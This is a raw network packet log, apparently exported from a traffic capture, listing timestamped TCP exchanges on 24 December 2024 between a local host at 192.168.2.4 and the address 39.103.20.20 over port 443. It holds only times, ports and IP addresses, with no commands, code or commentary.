Dec 24, 2024 15:12:35.690692902 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.700016022 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.700067997 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.700370073 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.700412989 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.701296091 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.701347113 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.702084064 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.702133894 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.720060110 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.720197916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.720422029 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.720490932 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.736094952 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.736140013 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.736506939 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.736548901 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.737363100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.737401009 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.738059044 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.738111019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.747987986 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.748037100 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.748255968 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.748305082 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.827914000 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.827958107 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.828222036 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.828267097 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.829458952 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.829502106 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.830291033 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.830332994 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.831221104 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.831273079 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.832093954 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.832139015 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.832987070 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.833036900 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.833849907 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.833894968 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.834988117 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.835030079 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.835593939 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.835638046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.875788927 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.875842094 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.876205921 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.876250029 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.876945972 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.876990080 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.877826929 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.877872944 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.878700972 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.878745079 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.879544973 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.879595041 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.880460978 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.880573034 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.882143974 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.882188082 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.882967949 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.883011103 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.883855104 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.883898973 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.891645908 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.892004967 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.892054081 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.892527103 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.892568111 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.893546104 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.893590927 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.894717932 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.894767046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.912273884 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.912329912 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.912646055 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.912694931 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.928291082 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.928354025 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.928740025 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.928790092 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.929605961 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.929663897 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.930473089 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.930526018 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.933206081 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.940165997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.940220118 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:35.940571070 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:35.940624952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.020494938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.020562887 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.020839930 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.020903111 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.021722078 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.021783113 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.022612095 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.022670031 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.023485899 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.023541927 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.024429083 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.024480104 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.025994062 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.026052952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.026900053 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.026946068 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.027851105 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.027909040 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.028628111 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.028681040 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.068223000 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.068331003 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.068578959 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.068646908 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.069402933 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.069458961 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.070277929 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.070331097 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.071177959 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.071233988 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.072976112 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.073034048 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.073790073 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.073843002 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.074768066 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.074824095 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.075534105 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.075578928 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.076462030 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.076509953 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.085601091 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.085633993 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.085669041 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.085680008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.085690975 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.085721970 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.085834026 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.085886955 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.086667061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.086714029 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.108040094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.108079910 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.108133078 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.108139992 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.108149052 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.108186007 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.120480061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.120532036 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.120891094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.120940924 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.123974085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.124007940 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.124034882 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.124042034 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.124063015 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.124082088 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.133359909 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.133419991 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.134063959 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.134116888 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.140759945 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.181106091 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.212793112 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.212857962 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.213175058 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.213231087 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.214025021 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.214082956 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.215049028 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.215096951 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.216578960 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.216629982 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.217428923 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.217489958 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.218381882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.218437910 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.219238043 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.219288111 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.220112085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.220163107 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.221108913 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.221158028 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.260479927 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.260564089 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.260888100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.260945082 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.261974096 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.262021065 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.264843941 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.264894009 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.264894009 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.264905930 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.264936924 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.264961004 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.265579939 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.265628099 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.266623974 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.266669989 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.267519951 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.267566919 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.267992020 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.268040895 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.268690109 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.268743038 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.276670933 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.276724100 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.277134895 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.277178049 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.278798103 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.278857946 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.279706955 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.279742002 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.296921968 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.296968937 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.297370911 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.297424078 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.312748909 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.312825918 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.313134909 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.313182116 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.314889908 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.314944029 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.315695047 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.315742970 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.327231884 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.327284098 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.327655077 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.327697992 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.378539085 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.405278921 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.405363083 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.405838013 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.405895948 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.406687975 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.406743050 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.408432007 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.408490896 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.409327030 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.409379005 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.410120964 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.410171032 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.411043882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.411098003 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.411887884 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.411935091 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.412899971 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.412949085 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.413832903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.413882017 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.452771902 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.452841043 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.454046011 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.454092979 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.454849958 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.454904079 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.455782890 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.455837965 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.456711054 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.456764936 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.458344936 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.458398104 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.458445072 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.458499908 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.460140944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.460194111 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.460608006 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.460661888 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.461767912 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.461842060 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.469417095 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.469475031 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.470171928 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.470225096 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.471029997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.471081972 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.472094059 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.472148895 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.489460945 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.489624977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.490387917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.490437984 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.505208015 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.505280018 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.506346941 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.506398916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.507131100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.507177114 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.507977962 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.508035898 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.519975901 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.520034075 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.520790100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.520836115 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.551464081 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.597616911 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.597716093 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.598509073 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.598560095 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.599364996 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.599411964 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.601044893 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.601104975 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.601948977 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.602005005 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.602821112 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.602871895 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.603744984 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.603791952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.604557037 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.604604959 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.605452061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.605504990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.644987106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.645117998 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.645334005 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.645406008 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.646212101 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.646276951 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.647066116 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.647125006 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.647953987 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.648077011 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.648783922 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.648848057 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.650607109 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.650672913 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.651432037 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.651489973 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.652234077 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.652297974 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.653111935 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.653170109 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.661351919 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.661441088 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.661611080 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.661670923 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.662575006 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:36.662632942 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:36.663438082 CET	443	49740	39.103.20.20	192.168.2.4
